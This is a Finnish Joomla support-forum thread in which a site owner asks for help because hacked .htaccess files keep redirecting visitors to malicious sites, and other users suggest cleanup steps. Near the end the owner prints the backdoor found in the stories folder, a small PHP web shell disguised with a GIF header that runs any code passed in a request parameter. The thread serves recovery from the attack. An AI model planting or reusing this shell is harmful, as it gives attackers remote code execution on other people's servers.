- Viestejä: 15
- Vastaanotettu kiitos 0
.htaccess uudelleenohjaukset pöpösivuille
- NonCoder
-
Aiheen kirjoittaja
- Poissa
- Tulokas
-
Vähemmän
Lisää
02.08.2012 06:59 - 02.08.2012 07:02 #2996
: NonCoder
NonCoder loi aiheen: .htaccess uudelleenohjaukset pöpösivuille
Moro vain pitkästä aikaa..
Nyt joutui hommiin sivujen kanssa, kun sinne oli ujutettu uudelleenohjaus ja alkoi tulla soittoja että virustutkat huutaa sivuilla ja välillä yrittää mennä jonnekkin venäjälle..
Kiirettä kun elämässä riittää niin huomasin että Joomla oli vanha 1.5.23? muistaakseni.. + muutamat lisäkomponentit oli myös kivikautisia.
Viimeksi muokattuja filejä palvelimella oli .htaccess filut joita olikin ilmestynyt jokapaikkaan.
Tässä sisältöä (osoitteet muokattuna xxx)
Siivosin ylimääräiset ja palautin alkuperäisen .htaccess tiedoston. Päivitin kaikki uusimpaan versioon ja vaihdoin kaikki salasanat.
sitecheck.sucuri.net sanoi että clean.
Kuitenkin 30-40minuutin päästä .htaccess oli taas muokattu?
Sivut on yksinkertaiset ja paria asennettua komponenttia lukuunottamatta toteutettu täysin Joomlalla.
Kuinkahan tässä lähtisi etenemään??
Sucuri sanoo:
www.osoite.com/javasript404.js
Suspicious domain detected.
Nyt joutui hommiin sivujen kanssa, kun sinne oli ujutettu uudelleenohjaus ja alkoi tulla soittoja että virustutkat huutaa sivuilla ja välillä yrittää mennä jonnekkin venäjälle..
Kiirettä kun elämässä riittää niin huomasin että Joomla oli vanha 1.5.23? muistaakseni.. + muutamat lisäkomponentit oli myös kivikautisia.
Viimeksi muokattuja filejä palvelimella oli .htaccess filut joita olikin ilmestynyt jokapaikkaan.
Tässä sisältöä (osoitteet muokattuna xxx)
Ei jostain syystä halua näkyä tämä?Siivosin ylimääräiset ja palautin alkuperäisen .htaccess tiedoston. Päivitin kaikki uusimpaan versioon ja vaihdoin kaikki salasanat.
sitecheck.sucuri.net sanoi että clean.
Kuitenkin 30-40minuutin päästä .htaccess oli taas muokattu?
Sivut on yksinkertaiset ja paria asennettua komponenttia lukuunottamatta toteutettu täysin Joomlalla.
Kuinkahan tässä lähtisi etenemään??
Sucuri sanoo:
www.osoite.com/javasript404.js
Suspicious domain detected.
Last Edit: 02.08.2012 07:02 : NonCoder.
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- mirkoe
-
- Poissa
- Ylläpitäjä
-
- Kahvilla pärjää aina!
02.08.2012 09:35 #2998
: mirkoe
Jos se on Joomlalla, teemme sen - www.clicker.fi
mirkoe vastasi aiheeseen: .htaccess uudelleenohjaukset pöpösivuille
Jos käytössäsi on Joomla 1.5.23, aloitat tietysti sillä että päivität sen uusimpaan versioon. Sivut kannattaa ottaa offline päivityksen ajaksi ja tarkastaa vielä kaikki kansiot noiden .htaccess filujen varalle.
Eräällä asiakkaallani oli aivan sama tilanne, kun ei ollut päivittänyt sivujaan. Ongelma korjaantui Joomlan päivityksen jälkeen.
Eräällä asiakkaallani oli aivan sama tilanne, kun ei ollut päivittänyt sivujaan. Ongelma korjaantui Joomlan päivityksen jälkeen.
Jos se on Joomlalla, teemme sen - www.clicker.fi
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- NonCoder
-
Aiheen kirjoittaja
- Poissa
- Tulokas
-
Vähemmän
Lisää
- Viestejä: 15
- Vastaanotettu kiitos 0
02.08.2012 09:41 #2999
: NonCoder
NonCoder vastasi aiheeseen: .htaccess uudelleenohjaukset pöpösivuille
Joomla päivitetty viimeisimpään 1.5.26 versioon.
Lisäosat päivitetty uusimpaan.
Kirjoitusoikeudet yms tarkistettu.
Kaikki salasanat vaihdettu.
Joku reikä tuolla on vielä oltava?
Lisäosat päivitetty uusimpaan.
Kirjoitusoikeudet yms tarkistettu.
Kaikki salasanat vaihdettu.
Joku reikä tuolla on vielä oltava?
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- mirkoe
-
- Poissa
- Ylläpitäjä
-
- Kahvilla pärjää aina!
02.08.2012 10:46 #3000
: mirkoe
Jos se on Joomlalla, teemme sen - www.clicker.fi
mirkoe vastasi aiheeseen: .htaccess uudelleenohjaukset pöpösivuille
Kävitkö varmasti kaikki kansiot läpi noiden .htaccess tiedostojen varalta? Ne kun ehtii luomaan uusia sitä mukaa kun poistaa?
Kannattaa ehkä ladata palvelimen tiedostot omalle koneelle, deletoida palvelimelta kaikki, puhdistaa tiedot omalla koneella ja ladata takaisin!
Kannattaa ehkä ladata palvelimen tiedostot omalle koneelle, deletoida palvelimelta kaikki, puhdistaa tiedot omalla koneella ja ladata takaisin!
Jos se on Joomlalla, teemme sen - www.clicker.fi
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- Kelpieracer
-
- Vieras
-
02.08.2012 13:08 - 02.08.2012 13:18 #3001
: Kelpieracer
Kelpieracer vastasi aiheeseen: .htaccess uudelleenohjaukset pöpösivuille
Mulla oli toveri saanut ujutettua Joomlan STORIES -hakemistoon pari PHP-tiedostoa, jotka sisälsivät näppärän takaoven sivustoon.
Toveri pystyi sitten ajamaan tuota PHP-tiedostoa, ilmeisesti jollain automatiikallaabout 20min välein ja antamaan sille parametreinä uusia metkuja suoritettavaksi.
Tätä kautta pääsivät sitten vaihtelemaan noita -htaccess -tiedostoja, lähinnä samalla palvelimella olevalta PHPBB-foorumilta.
Etsi sivustolta viimeisten muutaman päivän aikana muutetut PHP-tiedostot. Se virus on jokin tai jotkin niistä.
Itse poistin vaan nuo ylimääräiset PHP-tiedostot ja kun Joomla-sivusto on lukossa, ei .htaccessit enää muutu.
En tosin vielä tiedä, mitä reikää käyttäen tuon PHP-tiedoston ujuttaminen sivustolle on ollut mahdollista, mutta kun foorumi on lukossa, eivät ole uutta PHP-tiedosta ujuttaneet vielä.
e: sun pitää käsin poistaa nuo PHP-tiedostot. Joomlan päivittäminen uuteen versioon ei auta, jos toveri on jo tuon PHP-tiedoston sun palvelimelle ujuttanut. Toki uusi versio on hyvästä ennaltaehkäisyksi. Olisi kiva tietää, onko joku löytänyt tuon reiän, mitä käyttäen toveri tuon PHP-tiedostonsa saa meidän palvelimille ujutettua.
Toveri pystyi sitten ajamaan tuota PHP-tiedostoa, ilmeisesti jollain automatiikalla
GET:mydomain.com/STORY.PHP?param=...Tätä kautta pääsivät sitten vaihtelemaan noita -htaccess -tiedostoja, lähinnä samalla palvelimella olevalta PHPBB-foorumilta.
Etsi sivustolta viimeisten muutaman päivän aikana muutetut PHP-tiedostot. Se virus on jokin tai jotkin niistä.
Itse poistin vaan nuo ylimääräiset PHP-tiedostot ja kun Joomla-sivusto on lukossa, ei .htaccessit enää muutu.
En tosin vielä tiedä, mitä reikää käyttäen tuon PHP-tiedoston ujuttaminen sivustolle on ollut mahdollista, mutta kun foorumi on lukossa, eivät ole uutta PHP-tiedosta ujuttaneet vielä.
e: sun pitää käsin poistaa nuo PHP-tiedostot. Joomlan päivittäminen uuteen versioon ei auta, jos toveri on jo tuon PHP-tiedoston sun palvelimelle ujuttanut. Toki uusi versio on hyvästä ennaltaehkäisyksi. Olisi kiva tietää, onko joku löytänyt tuon reiän, mitä käyttäen toveri tuon PHP-tiedostonsa saa meidän palvelimille ujutettua.
Last Edit: 02.08.2012 13:18 : Kelpieracer.
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- quietFinn
-
- Poissa
- Valvoja
-
02.08.2012 14:52 #3002
: quietFinn
Kehottaisin ottamaan yhteyttä palveluntarjoajaan.
Koska siellä on tuollaista aktiviteettiä ollut ihan viime aikoina niin ei ole kovinkaan vaikeaa palvelimen lokeista löytää mitä takaporttia on käytetty.
Ja jos on kyseessä cPanel palvelin niin voi itsekin tutkia kävijälokeja:
cPanel-> Tilastot ja lokitiedostot-> Viimeisimmät kävijät
ja
cPanel-> Tilastot ja lokitiedostot-> Kävijälokit
netFinn - Taatusti Joomla!-yhteensopiva webhosting: www.netfinn.fi
quietFinn vastasi aiheeseen: .htaccess uudelleenohjaukset pöpösivuille
NonCoder kirjoitti: Joomla päivitetty viimeisimpään 1.5.26 versioon.
Lisäosat päivitetty uusimpaan.
Kirjoitusoikeudet yms tarkistettu.
Kaikki salasanat vaihdettu.
Joku reikä tuolla on vielä oltava?
Kehottaisin ottamaan yhteyttä palveluntarjoajaan.
Koska siellä on tuollaista aktiviteettiä ollut ihan viime aikoina niin ei ole kovinkaan vaikeaa palvelimen lokeista löytää mitä takaporttia on käytetty.
Ja jos on kyseessä cPanel palvelin niin voi itsekin tutkia kävijälokeja:
cPanel-> Tilastot ja lokitiedostot-> Viimeisimmät kävijät
ja
cPanel-> Tilastot ja lokitiedostot-> Kävijälokit
netFinn - Taatusti Joomla!-yhteensopiva webhosting: www.netfinn.fi
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- jkwebdesign
-
- Poissa
- Valvoja
-
02.08.2012 14:53 - 02.08.2012 14:56 #3003
: jkwebdesign
Asiakaslähtöisesti suunniteltuja internet- sekä graafisia palveluita: www.sutjakka.fi
jkwebdesign vastasi aiheeseen: .htaccess uudelleenohjaukset pöpösivuille
Tämä sama ongelma käsiteltiin n. Viikko sitten täällä samalla foorumilla. Käsittääkseni on kyse samasta pöpöstä, joka on eripirullinen. Eli katselkaa aiempia topicceja.. olen puhelimella liikenteessä joten en jaksa tällä ruveta penkomaan (tapatalk tukea kaipaisi kovasti).
Eli tuo tartunta voi olla oikeastaan missä tahansa php tiedostossa. Pahimmalla kerralla taisi olla koodinpätkää useassa kymmenessä filussa, joista suurin osa sivupohjissa.
Eli tuo tartunta voi olla oikeastaan missä tahansa php tiedostossa. Pahimmalla kerralla taisi olla koodinpätkää useassa kymmenessä filussa, joista suurin osa sivupohjissa.
Asiakaslähtöisesti suunniteltuja internet- sekä graafisia palveluita: www.sutjakka.fi
Last Edit: 02.08.2012 14:56 : jkwebdesign.
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- quuki
-
- Vieras
-
02.08.2012 16:03 - 02.08.2012 16:04 #3004
: quuki
quuki vastasi aiheeseen: .htaccess uudelleenohjaukset pöpösivuille
offtopic mutta täältä +1 tapatalkille 
Minulla oli kanssa vähän samaa ongelmaa omilla sivuilla, toki php tiedostojen kanssa. Sucurilla oli joku scripti (world pressille tarkoitettu mutta kävi myös joomlaan) jonka ajamalla sai puhdistettua joko kotisivuhakemiston php tiedostot kerralla. Kyse oli jostain Eval base64_decode jutusta. antoi uudelleenohjaus pyyntöjä jatkuvasti haittasivuille. Sucurin scriptin ajoin ja sitten ostin tuon OSE securitysuiten ja tietty kaikki muut asiat laitoin kuntoon, ja kunnossa olen pitänyt. Ei ongelmaa...
Minulla oli kanssa vähän samaa ongelmaa omilla sivuilla, toki php tiedostojen kanssa. Sucurilla oli joku scripti (world pressille tarkoitettu mutta kävi myös joomlaan) jonka ajamalla sai puhdistettua joko kotisivuhakemiston php tiedostot kerralla. Kyse oli jostain Eval base64_decode jutusta. antoi uudelleenohjaus pyyntöjä jatkuvasti haittasivuille. Sucurin scriptin ajoin ja sitten ostin tuon OSE securitysuiten ja tietty kaikki muut asiat laitoin kuntoon, ja kunnossa olen pitänyt. Ei ongelmaa...
Last Edit: 02.08.2012 16:04 : quuki. Syy: typo korjausta osa 1...
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- NonCoder
-
Aiheen kirjoittaja
- Poissa
- Tulokas
-
Vähemmän
Lisää
- Viestejä: 15
- Vastaanotettu kiitos 0
03.08.2012 06:54 #3016
: NonCoder
NonCoder vastasi aiheeseen: .htaccess uudelleenohjaukset pöpösivuille
Kokeilin taas kaikkea mahdollista ja tutkin kaikki hakemistot.
Sivut oli taas siivottu, mutta 30-40min myöhemmin tilanne palautui samaksi.
Latasin äsken varmuuskopion omalle koneelle ja löysin stories kansiosta story.php:n mitä ei ainakaan uudessa Joomla asennuspaketissa ole?
Sivut oli taas siivottu, mutta 30-40min myöhemmin tilanne palautui samaksi.
Latasin äsken varmuuskopion omalle koneelle ja löysin stories kansiosta story.php:n mitä ei ainakaan uudessa Joomla asennuspaketissa ole?
GIF89a1
<?php
if (isset($_REQUEST['p1'])) {
eval(stripslashes($_REQUEST['p1']));
} else {
echo "djeu84m";
}
?>Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- jkwebdesign
-
- Poissa
- Valvoja
-
03.08.2012 09:14 #3017
: jkwebdesign
Asiakaslähtöisesti suunniteltuja internet- sekä graafisia palveluita: www.sutjakka.fi
jkwebdesign vastasi aiheeseen: .htaccess uudelleenohjaukset pöpösivuille
Tuo on ainaskin gaggaa ja voi olla muutakin.. eli tarkasti vaan kaikki kansiot läpi.
Asiakaslähtöisesti suunniteltuja internet- sekä graafisia palveluita: www.sutjakka.fi
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
Valvojat: jkwebdesign, Gamoss, JiiKoo
Sivu luotiin ajassa: 0.059 sekuntia